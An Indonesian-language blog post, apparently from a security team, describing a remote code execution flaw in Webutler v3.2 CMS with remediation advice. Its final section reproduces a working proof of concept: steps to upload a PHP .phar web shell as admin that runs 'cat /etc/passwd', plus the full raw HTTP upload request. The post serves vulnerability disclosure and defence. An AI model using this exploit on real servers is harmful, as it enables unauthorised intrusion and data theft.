Project Legal Website Security Penetration Testing – Bug Bounty

Assalamualaikum sahabat Whitecyber semua, kali ini Whitecyber team mendapatkan project untuk melakukan LEGAL Penetration Testing pada sebuah web server. Dan tentunya ini tindakan legal karena digunakan dan diterapkan untuk mencari celah keamanan dari client whitecyber. 

Webutler v3.2 adalah sebuah perangkat lunak atau aplikasi yang memiliki kerentanan keamanan serius. Kerentanan ini memungkinkan penyerang untuk melakukan Remote Code Execution (RCE).

Apa itu Remote Code Execution (RCE)?

RCE adalah jenis serangan di mana penyerang dapat menjalankan kode sembarang di server atau sistem yang rentan. Ini seperti memberikan kunci akses penuh kepada penyerang untuk mengontrol sistem Anda. Dengan kata lain, penyerang bisa melakukan apa saja yang mereka inginkan pada sistem Anda, mulai dari mencuri data, merusak sistem, hingga menggunakan sistem Anda untuk menyerang sistem lain.

Mengapa Webutler v3.2 Berbahaya?

Kerentanan RCE pada Webutler v3.2 membuat aplikasi ini menjadi target empuk bagi para hacker. Jika Anda menggunakan Webutler v3.2 dan belum melakukan tindakan perbaikan, maka sistem Anda berisiko sangat tinggi untuk diretas.

Apa yang Harus Dilakukan?

Jika Anda menggunakan Webutler v3.2, sangat disarankan untuk:

  • Segera memperbarui: Pengembang Webutler kemungkinan besar telah merilis pembaruan untuk mengatasi kerentanan ini. Segera perbarui aplikasi Anda ke versi terbaru.
  • Hubungi penyedia: Jika Anda tidak yakin bagaimana cara memperbarui atau jika tidak ada pembaruan yang tersedia, hubungi penyedia Webutler untuk mendapatkan bantuan.
  • Tingkatkan keamanan: Selain memperbarui, Anda juga perlu meningkatkan keamanan sistem Anda secara keseluruhan. Ini termasuk menggunakan kata sandi yang kuat, mengaktifkan firewall, dan melakukan pemindaian keamanan secara berkala.
  • Cari alternatif: Jika tidak ada solusi yang memuaskan, pertimbangkan untuk beralih ke aplikasi lain yang lebih aman.

Informasi Tambahan

  • EDB-ID: 51660
  • CVE: N/A
  • Penemu: Mirabbas Ağalarov
  • Platform: PHP
  • Tanggal ditemukan: 2023-08-04

Sumber:

Kesimpulan

Kerentanan RCE pada Webutler v3.2 adalah ancaman serius yang tidak boleh diabaikan. Jika Anda menggunakan aplikasi ini, segera ambil tindakan untuk mengamankan sistem Anda.

Langkah-langkah hackingnya :

Exploit Title: Webutler v3.2 – Remote Code Execution (RCE)

Application: webutler Cms

Version: v3.2

Bugs:  RCE

Technology: PHP

Vendor URL: https://webutler.de/en

Software Link: http://webutler.de/download/webutler_v3.2.zip

Tested on: Linux

 

 

  1. Technical Details & POC

========================================

Langkah-langkah:

  1. login ke account sebagai admin
  2. ke folder media
  3. upload file phar
  4. upload file poc.phar

 

poc.phar file berisi :

<?php echo system(“cat /etc/passwd”);?>

 

  1. buka poc.phar file dengan me request poc :

 

POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1

Host: localhost

Content-Length: 40

sec-ch-ua:

sec-ch-ua-mobile: ?0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36

X_FILENAME: poc.phar

sec-ch-ua-platform: “”

Accept: */*

Origin: http://localhost

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: http://localhost/webutler_v3.2/admin/browser/index.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu

Connection: close

 

<?php echo system(“cat /etc/passwd”);?>

 

Solusi : Update ke Webutler terbaru.

Leave a Reply

Your email address will not be published. Required fields are marked *